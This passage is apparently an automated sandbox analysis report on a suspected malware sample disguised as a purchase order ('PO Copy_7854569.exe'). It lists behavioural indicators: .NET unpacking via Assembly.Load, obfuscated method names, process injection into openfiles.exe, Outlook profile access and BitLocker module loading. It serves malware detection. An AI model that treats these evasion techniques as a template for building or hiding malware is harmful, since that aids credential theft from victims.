            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO Copy_7854569.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO Copy_7854569.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: OpnFiles.pdb source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4439886342.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2205683578.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO Copy_7854569.exe, PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: PO Copy_7854569.exe, GameOfLife.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: PO Copy_7854569.exe, GameOfLife.cs.Net Code: InitializeComponent contains xor as well as GetObject
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.cs.Net Code: gvJ09pWBa8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO Copy_7854569.exe.31f6410.4.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO Copy_7854569.exe.7560000.9.raw.unpack, LoginForm.cs.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.cs.Net Code: gvJ09pWBa8 System.Reflection.Assembly.Load(byte[])
            Source: 8.2.openfiles.exe.4e7cd08.2.raw.unpack, GameOfLife.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 8.2.openfiles.exe.4e7cd08.2.raw.unpack, GameOfLife.cs.Net Code: InitializeComponent contains xor as well as GetObject
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00413F07 push 2F12636Bh; retf 6_2_00413F68
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00407043 push esp; ret 6_2_00407044
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00414087 push esi; ret 6_2_0041411F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00417891 push esi; ret 6_2_00417892
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_004140BC push esi; ret 6_2_0041411F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00414121 push esi; ret 6_2_0041411F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00402139 pushad ; ret 6_2_0040214B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0042CAC3 pushfd ; retf 6_2_0042CAFE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00405BED push ebp; retf 6_2_00405BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0041DC6B push esi; iretd 6_2_0041DC74
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00403410 push eax; ret 6_2_00403412
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0040743D push ebx; retf 6_2_00407445
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00417515 push ebx; ret 6_2_0041751C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00411D3F push es; retf 6_2_00411D46
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00413EA9 push edx; retf 6_2_00413EAA
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0160225F pushad ; ret 6_2_016027F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016027FA pushad ; ret 6_2_016027F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016309AD push ecx; mov dword ptr [esp], ecx6_2_016309B6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0160283D push eax; iretd 6_2_01602858
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01601328 push eax; iretd 6_2_01601369
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0388EBBA push esp; ret 7_2_0388EBBB
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038A61BB push ebp; retf 7_2_038A61BC
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0389F08C push ebx; ret 7_2_0389F093
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038998B6 push es; retf 7_2_038998BD
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_03810000 push esp; retf 7_2_03810001
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0388EFB4 push ebx; retf 7_2_0388EFBC
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038A57E2 push esi; iretd 7_2_038A57EB
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_0388D764 push ebp; retf 7_2_0388D767
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038B463A pushfd ; retf 7_2_038B4675
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038A65C4 push D4A4F74Ah; ret 7_2_038A65CB
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeCode function: 7_2_038A64DD push ss; ret 7_2_038A64DE
            Source: PO Copy_7854569.exeStatic PE information: section name: .text entropy: 7.965905089311066
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, OhkJ9nOLRoKG7gW3WD.csHigh entropy of concatenated method names: 'TDRwituHL4', 'WLZwHiAxW3', 'P5nwa60Ia3', 'GFDwsTvGWO', 'jufwy0DOcQ', 'g80aKaCEId', 'DP7a676T3H', 'oInaeuKQOX', 'blKaSo4QfJ', 'q5VajogUPC'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, peWhJDCjwBaMwsIn3F.csHigh entropy of concatenated method names: 'IFosIRKFky', 'Vy1soijwLh', 'yOJs9dmqYx', 'u5mscVDkBc', 'SErs2EEoPV', 'KAFsrb0iVD', 'v04sq5N1it', 'n77sWBjj5L', 'B6ysMcDjdP', 'YeTsYEr9CU'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sJyjJmRBhqG0a3LJbf.csHigh entropy of concatenated method names: 'YHtnW99JQl', 'p3gnMI9LZ4', 'nxVnOXrWK4', 'iL2nflGojv', 'OO9nlB2wR1', 'olSnLIwyLB', 'rjYnNZBW2d', 'u2tndt00aV', 'vuonggphZZ', 'xrMnv0rxt6'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, Q0dZA0SOwkgV01K6U7.csHigh entropy of concatenated method names: 'hfv1tx2T7i', 'M3v1HofWtu', 'HLL1hYe6QD', 'Shy1aDZjPI', 'kOt1w8ttlA', 'cVh1siWwIi', 'tSP1yNuSek', 'mgU1JGbg31', 'KJL1uCVQUK', 'cVN1xRRDpm'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, n39DtdDEZ05W1mcBdY.csHigh entropy of concatenated method names: 'j99TuIMSOS', 'foATxJ77Pg', 'ToString', 'lEoTt9Oesv', 'tGCTHqkQYo', 'MaQThPOVBO', 'WpnTamLcR3', 's1PTw20Ivr', 'uVxTs1IPK1', 'NM9TyUpYRN'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, BSloyIHpKq50USdnyv.csHigh entropy of concatenated method names: 'Dispose', 'XD3AjtG84Q', 'M5iUf1mTAJ', 'vx5wwEkkbL', 'sb0AEdZA0O', 'ikgAzV01K6', 'ProcessDialogKey', 'c7VUGSgXJG', 'bFVUA8XnUD', 'KgwUUtZyjG'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, EMiiKLWxXWlFcu6Hvp.csHigh entropy of concatenated method names: 'fJuHb8bW20', 'QbnH5XP3gG', 'EiAHkxWbKQ', 'HohHDLhZUD', 'AFrHKEdCuR', 'Vs3H6TpZ4x', 'viTHeCGHfl', 'xdZHS54ewm', 'fedHjbQhDI', 'SBXHElaJ9p'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, r0KqCkAGoVeL9JewmMl.csHigh entropy of concatenated method names: 'UlFQIyEUO9', 'xHwQokrUfq', 'R2iQ9DyqMD', 'KbvQcoPvXn', 'v0VQ2jQFmg', 'cbKQrHtUTO', 'MWDQqpteBT', 'CBpQWLlZhG', 'mCMQMTvkaJ', 'eCSQYmLoO2'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, IiLPlTApY2IwdUFgvUr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PO0mbQwcLe', 'YDAm599N8i', 'TcHmkEgESa', 'YcrmDkt6IT', 'CAemKhdVmE', 'cOym6UI4Tq', 'cKhmeZ3SYj'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, hIjXjEkgWLCMLWlqkR.csHigh entropy of concatenated method names: 'ToString', 'bw5BvqNNvr', 'PEYBf3NC4L', 'QtSBXnkbOD', 'vKaBl4iAgJ', 'PbUBL7U3pU', 'lEABPjvZtb', 'MD8BNwC9oa', 'YYeBd9Pg78', 'aTlBCHEc6Z'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, Yl2TpEhOAV3Wgukmev.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xnYUjQUba7', 'OtyUEQkt9n', 'lvKUz0ybQX', 'D4DpGREIK2', 'LqJpAZRhMQ', 'w8kpUsRJpG', 'kLCppOqoey', 'bedmAwU8gmhJcKHIvNZ'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, eQTGxQMCriBPUECQkp.csHigh entropy of concatenated method names: 'IFThceXOeu', 'nRahrWAFkO', 'tHfhWB5wAe', 'blGhM4EU16', 'I1Yh3WiG3p', 'gg6hBfcEaq', 'roChT8WGof', 'M7Ph1U2nIw', 'EQAhQKrJMs', 'a9ehm1ogYh'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, fZyjGrE41t2wZ3yExt.csHigh entropy of concatenated method names: 'BKjQAiy4Jx', 'uewQpkc5nD', 'fTJQ03uIkK', 'ixdQt1QLro', 'MFxQH0nUIM', 'sH0QaQoPLw', 'rjEQwtRHrs', 'LB11ebknmw', 'on21SgU0kC', 'r2s1j0oPf7'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, F1oKItzxuhOn7N0oJw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gERQnVME3a', 'G5sQ3CcTcB', 'jG2QBcvnUq', 'XU8QTwAVpf', 'BN3Q1qF0pU', 'TXeQQShfT6', 'wmoQmkB7jN'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, IHN8cPAUqHFw18sXLCB.csHigh entropy of concatenated method names: 'NTomILlGVl', 'dx3moaUGux', 'svHm98Jsk7', 'cmTvXvjV8S8rZlWqfH6', 'opWs6oj1hQ7eStUNr8x', 'lMK3s6jwJM20D6BAFnZ', 'Mxl8P0jlB7Jy8JdfOGn', 'oVaWxpj7HrEiAFIoNkd'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.csHigh entropy of concatenated method names: 'G70piL5xeU', 'U6optABSFC', 'nOPpHk0EDx', 'L9QphUL8MB', 'vorpahvN4L', 'qyLpwjAD1n', 'yX2psVDnxG', 'btbpyuFTQb', 'VMTpJv69pL', 'LB2puFHCj4'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, nQM0YSNn91jdHnqgms.csHigh entropy of concatenated method names: 'Dn2stD0q7D', 'arYshEQtHd', 'sO7swuuFL0', 'TROwEUfIuO', 'iDJwzpjRLS', 'uyQsGi7pX5', 'Bo1sAxC3ZH', 'HRpsU74jb1', 'ItospI9rdc', 'EFGs080kym'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, X82ux400NwfAo6U6vk.csHigh entropy of concatenated method names: 'h5MAsMiiKL', 'nXWAylFcu6', 'rCrAuiBPUE', 'MQkAxpDXcc', 'q6SA369vhk', 'l9nABLRoKG', 'q6GuqmcnZ5UQBZCuXD', 'v41UndumUFgyITsvHq', 'XmGAAmdQE0', 'RJKAp5VAr0'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, vSgXJGjAFV8XnUDPgw.csHigh entropy of concatenated method names: 'WEO1OEIesd', 'Cm81ff7SHW', 'vyV1X65O0l', 'jpf1lSHYfg', 'blk1bDYN8y', 'vxC1L5QyBn', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, oQukkDbPliL2oqnu2j.csHigh entropy of concatenated method names: 'hra3gA9bYm', 'HDl3FISXQ9', 'RCu3bQaWp7', 'svS35gQGbx', 'xMA3fxpYdG', 'eEC3XkofYS', 'hGd3lARFfo', 'HuS3Lgd41t', 'BL23PZlune', 'grC3NgYmeK'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, AbWPMTUYK7UmKegXNW.csHigh entropy of concatenated method names: 'z1w9mLk3p', 'W9ac7usDj', 'nGTrwkxSt', 'RRoqNZTwb', 'PrJMFsRMp', 'pJqYCNqdc', 'NRpk4oSSR3iJZudKxb', 'oE1T3WeEJljmrroITu', 'egM1WHRCU', 'oOSm9gkXj'
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, Fn7r8x6bOEExq2An9V.csHigh entropy of concatenated method names: 'nrfTSdfYNh', 'aiOTEXpn6S', 'nqf1G2jJAt', 'hJk1AL3AUw', 'VdkTv7yQpS', 'SaqTFFkN9E', 'lYTTRFB1a5', 'mnLTbQ5GJ8', 'cAjT5m1hZF', 'F8UTkHYCkD'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, OhkJ9nOLRoKG7gW3WD.csHigh entropy of concatenated method names: 'TDRwituHL4', 'WLZwHiAxW3', 'P5nwa60Ia3', 'GFDwsTvGWO', 'jufwy0DOcQ', 'g80aKaCEId', 'DP7a676T3H', 'oInaeuKQOX', 'blKaSo4QfJ', 'q5VajogUPC'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, peWhJDCjwBaMwsIn3F.csHigh entropy of concatenated method names: 'IFosIRKFky', 'Vy1soijwLh', 'yOJs9dmqYx', 'u5mscVDkBc', 'SErs2EEoPV', 'KAFsrb0iVD', 'v04sq5N1it', 'n77sWBjj5L', 'B6ysMcDjdP', 'YeTsYEr9CU'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sJyjJmRBhqG0a3LJbf.csHigh entropy of concatenated method names: 'YHtnW99JQl', 'p3gnMI9LZ4', 'nxVnOXrWK4', 'iL2nflGojv', 'OO9nlB2wR1', 'olSnLIwyLB', 'rjYnNZBW2d', 'u2tndt00aV', 'vuonggphZZ', 'xrMnv0rxt6'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, Q0dZA0SOwkgV01K6U7.csHigh entropy of concatenated method names: 'hfv1tx2T7i', 'M3v1HofWtu', 'HLL1hYe6QD', 'Shy1aDZjPI', 'kOt1w8ttlA', 'cVh1siWwIi', 'tSP1yNuSek', 'mgU1JGbg31', 'KJL1uCVQUK', 'cVN1xRRDpm'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, n39DtdDEZ05W1mcBdY.csHigh entropy of concatenated method names: 'j99TuIMSOS', 'foATxJ77Pg', 'ToString', 'lEoTt9Oesv', 'tGCTHqkQYo', 'MaQThPOVBO', 'WpnTamLcR3', 's1PTw20Ivr', 'uVxTs1IPK1', 'NM9TyUpYRN'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, BSloyIHpKq50USdnyv.csHigh entropy of concatenated method names: 'Dispose', 'XD3AjtG84Q', 'M5iUf1mTAJ', 'vx5wwEkkbL', 'sb0AEdZA0O', 'ikgAzV01K6', 'ProcessDialogKey', 'c7VUGSgXJG', 'bFVUA8XnUD', 'KgwUUtZyjG'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, EMiiKLWxXWlFcu6Hvp.csHigh entropy of concatenated method names: 'fJuHb8bW20', 'QbnH5XP3gG', 'EiAHkxWbKQ', 'HohHDLhZUD', 'AFrHKEdCuR', 'Vs3H6TpZ4x', 'viTHeCGHfl', 'xdZHS54ewm', 'fedHjbQhDI', 'SBXHElaJ9p'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, r0KqCkAGoVeL9JewmMl.csHigh entropy of concatenated method names: 'UlFQIyEUO9', 'xHwQokrUfq', 'R2iQ9DyqMD', 'KbvQcoPvXn', 'v0VQ2jQFmg', 'cbKQrHtUTO', 'MWDQqpteBT', 'CBpQWLlZhG', 'mCMQMTvkaJ', 'eCSQYmLoO2'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, IiLPlTApY2IwdUFgvUr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PO0mbQwcLe', 'YDAm599N8i', 'TcHmkEgESa', 'YcrmDkt6IT', 'CAemKhdVmE', 'cOym6UI4Tq', 'cKhmeZ3SYj'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, hIjXjEkgWLCMLWlqkR.csHigh entropy of concatenated method names: 'ToString', 'bw5BvqNNvr', 'PEYBf3NC4L', 'QtSBXnkbOD', 'vKaBl4iAgJ', 'PbUBL7U3pU', 'lEABPjvZtb', 'MD8BNwC9oa', 'YYeBd9Pg78', 'aTlBCHEc6Z'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, Yl2TpEhOAV3Wgukmev.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xnYUjQUba7', 'OtyUEQkt9n', 'lvKUz0ybQX', 'D4DpGREIK2', 'LqJpAZRhMQ', 'w8kpUsRJpG', 'kLCppOqoey', 'bedmAwU8gmhJcKHIvNZ'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, eQTGxQMCriBPUECQkp.csHigh entropy of concatenated method names: 'IFThceXOeu', 'nRahrWAFkO', 'tHfhWB5wAe', 'blGhM4EU16', 'I1Yh3WiG3p', 'gg6hBfcEaq', 'roChT8WGof', 'M7Ph1U2nIw', 'EQAhQKrJMs', 'a9ehm1ogYh'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, fZyjGrE41t2wZ3yExt.csHigh entropy of concatenated method names: 'BKjQAiy4Jx', 'uewQpkc5nD', 'fTJQ03uIkK', 'ixdQt1QLro', 'MFxQH0nUIM', 'sH0QaQoPLw', 'rjEQwtRHrs', 'LB11ebknmw', 'on21SgU0kC', 'r2s1j0oPf7'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, F1oKItzxuhOn7N0oJw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gERQnVME3a', 'G5sQ3CcTcB', 'jG2QBcvnUq', 'XU8QTwAVpf', 'BN3Q1qF0pU', 'TXeQQShfT6', 'wmoQmkB7jN'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, IHN8cPAUqHFw18sXLCB.csHigh entropy of concatenated method names: 'NTomILlGVl', 'dx3moaUGux', 'svHm98Jsk7', 'cmTvXvjV8S8rZlWqfH6', 'opWs6oj1hQ7eStUNr8x', 'lMK3s6jwJM20D6BAFnZ', 'Mxl8P0jlB7Jy8JdfOGn', 'oVaWxpj7HrEiAFIoNkd'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.csHigh entropy of concatenated method names: 'G70piL5xeU', 'U6optABSFC', 'nOPpHk0EDx', 'L9QphUL8MB', 'vorpahvN4L', 'qyLpwjAD1n', 'yX2psVDnxG', 'btbpyuFTQb', 'VMTpJv69pL', 'LB2puFHCj4'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, nQM0YSNn91jdHnqgms.csHigh entropy of concatenated method names: 'Dn2stD0q7D', 'arYshEQtHd', 'sO7swuuFL0', 'TROwEUfIuO', 'iDJwzpjRLS', 'uyQsGi7pX5', 'Bo1sAxC3ZH', 'HRpsU74jb1', 'ItospI9rdc', 'EFGs080kym'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, X82ux400NwfAo6U6vk.csHigh entropy of concatenated method names: 'h5MAsMiiKL', 'nXWAylFcu6', 'rCrAuiBPUE', 'MQkAxpDXcc', 'q6SA369vhk', 'l9nABLRoKG', 'q6GuqmcnZ5UQBZCuXD', 'v41UndumUFgyITsvHq', 'XmGAAmdQE0', 'RJKAp5VAr0'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, vSgXJGjAFV8XnUDPgw.csHigh entropy of concatenated method names: 'WEO1OEIesd', 'Cm81ff7SHW', 'vyV1X65O0l', 'jpf1lSHYfg', 'blk1bDYN8y', 'vxC1L5QyBn', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, oQukkDbPliL2oqnu2j.csHigh entropy of concatenated method names: 'hra3gA9bYm', 'HDl3FISXQ9', 'RCu3bQaWp7', 'svS35gQGbx', 'xMA3fxpYdG', 'eEC3XkofYS', 'hGd3lARFfo', 'HuS3Lgd41t', 'BL23PZlune', 'grC3NgYmeK'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, AbWPMTUYK7UmKegXNW.csHigh entropy of concatenated method names: 'z1w9mLk3p', 'W9ac7usDj', 'nGTrwkxSt', 'RRoqNZTwb', 'PrJMFsRMp', 'pJqYCNqdc', 'NRpk4oSSR3iJZudKxb', 'oE1T3WeEJljmrroITu', 'egM1WHRCU', 'oOSm9gkXj'
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, Fn7r8x6bOEExq2An9V.csHigh entropy of concatenated method names: 'nrfTSdfYNh', 'aiOTEXpn6S', 'nqf1G2jJAt', 'hJk1AL3AUw', 'VdkTv7yQpS', 'SaqTFFkN9E', 'lYTTRFB1a5', 'mnLTbQ5GJ8', 'cAjT5m1hZF', 'F8UTkHYCkD'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
